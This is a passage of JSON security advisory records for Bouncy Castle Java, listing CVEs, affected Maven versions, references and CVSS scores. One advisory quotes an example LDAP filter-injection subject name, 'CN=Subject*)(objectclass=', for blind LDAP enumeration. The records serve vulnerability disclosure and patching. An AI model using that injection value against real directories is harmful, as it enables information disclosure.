"https://github.com/bcgit/bc-java/commit/1127131c89021612c6eefa26dbe5714c194e7495#diff-d525a20b8acaed791ae2f0f770eb5937" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2669" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2927" }, { 
"type": "ADVISORY", "url": "https://github.com/advisories/GHSA-fjqm-246c-mwqg" }, { "type": "PACKAGE", "url": "https://github.com/bcgit/bc-java" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181127-0004" }, { "type": "WEB", "url": "https://usn.ubuntu.com/3727-1" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:34:48Z", "nvd_published_at": "2018-06-04T21:29:00Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-hr8g-6v94-x4m9", "published": "2023-07-05T03:30:23Z", "modified": "2024-10-22T05:28:49.779895Z", "aliases": [ "CGA-9v29-fwrv-3vmr", "CVE-2023-33201" ], "related": [ "CGA-38pq-3m5v-j985", "CGA-g7rp-wcpp-h755", "CGA-h3hg-g6x6-9xjh", "CGA-w3f3-pcfm-c69g" ], "summary": "Bouncy Castle For Java LDAP injection vulnerability", "details": "Bouncy Castle provides the `X509LDAPCertStoreSpi.java` class which can be used in conjunction with the CertPath API for validating certificate paths. Pre-1.73 the implementation did not check the X.500 name of any certificate, subject, or issuer being passed in for LDAP wild cards, meaning the presence of a wild card may lead to Information Disclosure.\n\nA potential attack would be to generate a self-signed certificate with a subject name that contains special characters, e.g: `CN=Subject*)(objectclass=`. This will be included into the filter and provides the attacker ability to specify additional attributes in the search query. This can be exploited as a blind LDAP injection: an attacker can enumerate valid attribute values using the boolean blind injection technique.
The exploitation depends on the structure of the target LDAP directory, as well as what kind of errors are exposed to the user.\n\nChanges to the `X509LDAPCertStoreSpi.java` class add the additional checking of any X.500 name used to correctly escape wild card characters.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk18on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk18on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.74" } ] } ], "versions": [ "1.71", "1.71.1", "1.72", "1.73" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-hr8g-6v94-x4m9/GHSA-hr8g-6v94-x4m9.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15to18", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15to18" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.74" } ] } ], "versions": [ "1.63", "1.64", "1.65", "1.66", "1.67", "1.68", "1.69", "1.70", "1.71", "1.72", "1.73" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-hr8g-6v94-x4m9/GHSA-hr8g-6v94-x4m9.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.49" }, { "fixed": "1.74" } ] } ], "versions": [ "1.49", "1.50", "1.51", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60", "1.61", "1.62", "1.63", "1.64", "1.65", "1.67", "1.68", "1.69", "1.70", "1.71", "1.72", "1.73" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-hr8g-6v94-x4m9/GHSA-hr8g-6v94-x4m9.json" } }, { "package": { "name": "org.bouncycastle:bcprov-ext-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-ext-jdk14" 
}, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.49" }, { "fixed": "1.74" } ] } ], "versions": [ "1.49", "1.50", "1.51", "1.53", "1.54", "1.56", "1.57", "1.58", "1.60", "1.64", "1.65", "1.67", "1.68", "1.69", "1.70", "1.71", "1.72", "1.73" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-hr8g-6v94-x4m9/GHSA-hr8g-6v94-x4m9.json" } }, { "package": { "name": "org.bouncycastle:bcprov-ext-jdk15to18", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-ext-jdk15to18" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.74" } ] } ], "versions": [ "1.64", "1.67", "1.68", "1.69", "1.70", "1.71", "1.72", "1.73" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-hr8g-6v94-x4m9/GHSA-hr8g-6v94-x4m9.json" } }, { "package": { "name": "org.bouncycastle:bcprov-ext-jdk18on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-ext-jdk18on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.74" } ] } ], "versions": [ "1.71", "1.72", "1.73" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-hr8g-6v94-x4m9/GHSA-hr8g-6v94-x4m9.json" } }, { "package": { "name": "org.bouncycastle:bcprov-debug-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-debug-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.49" }, { "fixed": "1.74" } ] } ], "versions": [ "1.55", "1.59", "1.60", "1.64", "1.68", "1.69", "1.70", "1.71", "1.72", "1.73" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-hr8g-6v94-x4m9/GHSA-hr8g-6v94-x4m9.json" } }, { "package": { "name": "org.bouncycastle:bcprov-debug-jdk15to18", "ecosystem": "Maven", "purl": 
"pkg:maven/org.bouncycastle/bcprov-debug-jdk15to18" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.74" } ] } ], "versions": [ "1.64", "1.68", "1.69", "1.70", "1.71", "1.72", "1.73" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-hr8g-6v94-x4m9/GHSA-hr8g-6v94-x4m9.json" } }, { "package": { "name": "org.bouncycastle:bcprov-debug-jdk18on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-debug-jdk18on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.74" } ] } ], "versions": [ "1.71", "1.72", "1.73" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-hr8g-6v94-x4m9/GHSA-hr8g-6v94-x4m9.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.49" }, { "last_affected": "1.70" } ] } ], "versions": [ "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60", "1.61", "1.62", "1.63", "1.64", "1.65", "1.65.01", "1.66", "1.67", "1.68", "1.69", "1.70" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-hr8g-6v94-x4m9/GHSA-hr8g-6v94-x4m9.json" } }, { "package": { "name": "org.bouncycastle:bcprov-ext-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-ext-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.49" }, { "last_affected": "1.70" } ] } ], "versions": [ "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60", "1.61", "1.62", "1.63", "1.64", "1.65", "1.66", "1.67", "1.68", "1.69", "1.70" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-hr8g-6v94-x4m9/GHSA-hr8g-6v94-x4m9.json" } }, { "package": { "name": "org.bouncycastle:bcprov-debug-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-debug-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.49" }, { "last_affected": "1.70" } ] } ], "versions": [ "1.52", "1.53", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60", "1.61", "1.62", "1.63", "1.64", "1.65", "1.66", "1.67", "1.68", "1.69", "1.70" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-hr8g-6v94-x4m9/GHSA-hr8g-6v94-x4m9.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33201" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/ccf93ca736b89250ff4ce079a5aa56f5cbf0ebbd" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/e8c409a8389c815ea3fda5e8b94c92fdfe583bcc" }, { "type": "WEB", "url": "https://bouncycastle.org" }, { "type": "WEB", "url": "https://bouncycastle.org/releasenotes.html#r1rv74" }, { "type": "PACKAGE", "url": "https://github.com/bcgit/bc-java" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commits/main/prov/src/main/java/org/bouncycastle/jce/provider/X509LDAPCertStoreSpi.java" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/wiki/CVE-2023-33201" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00000.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230824-0008" } ], "database_specific": { "cwe_ids": [ "CWE-295" ], "github_reviewed": true, "github_reviewed_at": "2023-07-06T15:40:29Z", "nvd_published_at": "2023-07-05T03:15:09Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": 
"GHSA-qcj7-g2j5-g7r3", "published": "2018-10-17T16:24:12Z", "modified": "2025-09-02T21:09:14.819658Z", "aliases": [ "CVE-2016-1000342" ], "summary": "In Bouncy Castle JCE Provider ECDSA does not fully validate ASN.1 encoding of signature on verification", "details": "In the Bouncy Castle JCE Provider version 1.55 and earlier ECDSA does not fully validate ASN.1 encoding of signature on verification. It is possible to inject extra elements in the sequence making up the signature and still have it validate, which in some cases may allow the introduction of 'invisible' data into a signed structure.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-qcj7-g2j5-g7r3/GHSA-qcj7-g2j5-g7r3.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.32", "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-qcj7-g2j5-g7r3/GHSA-qcj7-g2j5-g7r3.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-qcj7-g2j5-g7r3/GHSA-qcj7-g2j5-g7r3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1000342" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/843c2e60f67d71faf81d236f448ebbe56c62c647#diff-25c3c78db788365f36839b3f2d3016b9" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2669" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2927" }, { "type": "PACKAGE", "url": "https://github.com/bcgit/bc-java" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181127-0004" }, { "type": "WEB", "url": "https://usn.ubuntu.com/3727-1" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [ "CWE-347" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:51:36Z", "nvd_published_at": "2018-06-04T13:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-r97x-3g8f-gx3m", "published": "2018-10-17T16:23:50Z", "modified": "2025-09-12T20:11:40.283362Z", "aliases": [ "CVE-2016-1000340" ], "summary": "The Bouncy Castle JCE Provider has a carry propagation bug", "details": "In the Bouncy Castle JCE Provider versions 1.51 to 1.55, a carry propagation bug was introduced in the implementation of squaring for several raw math classes (org.bouncycastle.math.raw.Nat???); it has since been fixed. These classes are used by our custom elliptic curve implementations (org.bouncycastle.math.ec.custom.**), so there was the possibility of rare (in general usage) spurious calculations for elliptic curve scalar multiplications.
Such errors would have been detected with high probability by the output validation for our scalar multipliers.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.51" }, { "fixed": "1.56" } ] } ], "versions": [ "1.51", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-r97x-3g8f-gx3m/GHSA-r97x-3g8f-gx3m.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.51" }, { "fixed": "1.56" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-r97x-3g8f-gx3m/GHSA-r97x-3g8f-gx3m.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.51" }, { "fixed": "1.56" } ] } ], "versions": [ "1.51", "1.52", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-r97x-3g8f-gx3m/GHSA-r97x-3g8f-gx3m.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1000340" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/790642084c4e0cadd47352054f868cc8397e2c00#diff-e5934feac8203ca0104ab291a3560a31" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2669" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2927" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-r97x-3g8f-gx3m" }, { "type": "PACKAGE", "url": 
"https://github.com/bcgit/bc-java" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181127-0004" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:54:10Z", "nvd_published_at": "2018-06-04T13:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-r9ch-m4fh-fc7q", "published": "2018-10-17T16:24:00Z", "modified": "2025-09-12T20:09:31.244100Z", "aliases": [ "CVE-2016-1000341" ], "summary": "Moderate severity vulnerability that affects org.bouncycastle:bcprov-jdk14 and org.bouncycastle:bcprov-jdk15", "details": "In the Bouncy Castle JCE Provider version 1.55 and earlier DSA signature generation is vulnerable to timing attack. Where timings can be closely observed for the generation of signatures, the lack of blinding in 1.55, or earlier, may allow an attacker to gain information about the signature's k value and ultimately the private value as well.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-r9ch-m4fh-fc7q/GHSA-r9ch-m4fh-fc7q.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.32", "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { 
"source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-r9ch-m4fh-fc7q/GHSA-r9ch-m4fh-fc7q.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-r9ch-m4fh-fc7q/GHSA-r9ch-m4fh-fc7q.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1000341" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/acaac81f96fec91ab45bd0412beaf9c3acd8defa#diff-e75226a9ca49217a7276b29242ec59ce" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2669" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2927" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-r9ch-m4fh-fc7q" }, { "type": "PACKAGE", "url": "https://github.com/bcgit/bc-java" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181127-0004" }, { "type": "WEB", "url": "https://usn.ubuntu.com/3727-1" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:54:15Z", "nvd_published_at": "2018-06-04T13:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rrvx-pwf8-p59p", "published": "2018-10-17T16:24:22Z", "modified": "2025-09-12T20:11:26.404347Z", "aliases": [ "CVE-2016-1000343" ], "summary": "In 
Bouncy Castle JCE Provider the DSA key pair generator generates a weak private key if used with default values", "details": "In the Bouncy Castle JCE Provider version 1.55 and earlier the DSA key pair generator generates a weak private key if used with default values. If the JCA key pair generator is not explicitly initialised with DSA parameters, 1.55 and earlier generates a private value assuming a 1024 bit key size. In earlier releases this can be dealt with by explicitly passing parameters to the key pair generator.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-rrvx-pwf8-p59p/GHSA-rrvx-pwf8-p59p.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.32", "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-rrvx-pwf8-p59p/GHSA-rrvx-pwf8-p59p.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-rrvx-pwf8-p59p/GHSA-rrvx-pwf8-p59p.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1000343" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/50a53068c094d6cff37659da33c9b4505becd389#diff-5578e61500abb2b87b300d3114bdfd7d" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2669" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2927" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-rrvx-pwf8-p59p" }, { "type": "PACKAGE", "url": "https://github.com/bcgit/bc-java" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181127-0004" }, { "type": "WEB", "url": "https://usn.ubuntu.com/3727-1" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:55:50Z", "nvd_published_at": "2018-06-04T13:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-v435-xc8x-wvr9", "published": "2024-05-14T15:32:54Z", "modified": "2024-10-22T05:28:59.209889Z", "aliases": [ "CGA-2f4h-fc34-cw83", "CGA-5mrq-75x2-g8hj", "CGA-9qv8-44xh-vf2p", "CVE-2024-30171" ], "related": [ "CGA-35r6-m6p6-xc93", "CGA-38cm-jrfp-jgjm", "CGA-3cjr-985f-7r7h", "CGA-7fm6-4c5m-gw2x", "CGA-8595-m6wp-3rgq", "CGA-9727-f845-q3xw", "CGA-9c2c-7969-vffw", "CGA-9vcm-5pxq-pvv5", "CGA-fcmx-xq2g-xppj", "CGA-g4x8-993m-grwh", "CGA-gfj5-2q78-6f2f", "CGA-h543-7w38-mv7r", "CGA-j49x-3x3f-7v84", 
"CGA-jjp7-6mw2-545w", "CGA-vwqh-4f8x-m5r2" ], "summary": "Bouncy Castle affected by timing side-channel for RSA key exchange (\"The Marvin Attack\")", "details": "An issue was discovered in Bouncy Castle Java TLS API and JSSE Provider before 1.78. Timing-based leakage may occur in RSA based handshakes because of exception processing.", "affected": [ { "package": { "name": "org.bouncycastle:bctls-fips", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bctls-fips" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.0.19" } ] } ], "versions": [ "1.0.0", "1.0.1", "1.0.10", "1.0.10.1", "1.0.10.2", "1.0.10.3", "1.0.11", "1.0.11.1", "1.0.11.2", "1.0.11.3", "1.0.11.4", "1.0.12", "1.0.12.1", "1.0.12.2", "1.0.12.3", "1.0.13", "1.0.14", "1.0.14.1", "1.0.16", "1.0.17", "1.0.18", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "1.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-v435-xc8x-wvr9/GHSA-v435-xc8x-wvr9.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk18on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk18on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.78" } ] } ], "versions": [ "1.71", "1.71.1", "1.72", "1.73", "1.74", "1.75", "1.76", "1.77" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-v435-xc8x-wvr9/GHSA-v435-xc8x-wvr9.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.78" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60", "1.61", "1.62", "1.63", "1.64", "1.65", "1.65.01", "1.66", "1.67", "1.68", 
"1.69", "1.70" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-v435-xc8x-wvr9/GHSA-v435-xc8x-wvr9.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15to18", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15to18" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.78" } ] } ], "versions": [ "1.63", "1.64", "1.65", "1.66", "1.67", "1.68", "1.69", "1.70", "1.71", "1.72", "1.73", "1.74", "1.75", "1.76", "1.77" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-v435-xc8x-wvr9/GHSA-v435-xc8x-wvr9.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.78" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60", "1.61", "1.62", "1.63", "1.64", "1.65", "1.67", "1.68", "1.69", "1.70", "1.71", "1.72", "1.73", "1.74", "1.75", "1.76", "1.77" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-v435-xc8x-wvr9/GHSA-v435-xc8x-wvr9.json" } }, { "package": { "name": "org.bouncycastle:bctls-jdk18on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bctls-jdk18on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.78" } ] } ], "versions": [ "1.71", "1.71.1", "1.72", "1.73", "1.74", "1.75", "1.76", "1.77" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-v435-xc8x-wvr9/GHSA-v435-xc8x-wvr9.json" } }, { "package": { "name": "org.bouncycastle:bctls-jdk14", "ecosystem": "Maven", "purl": 
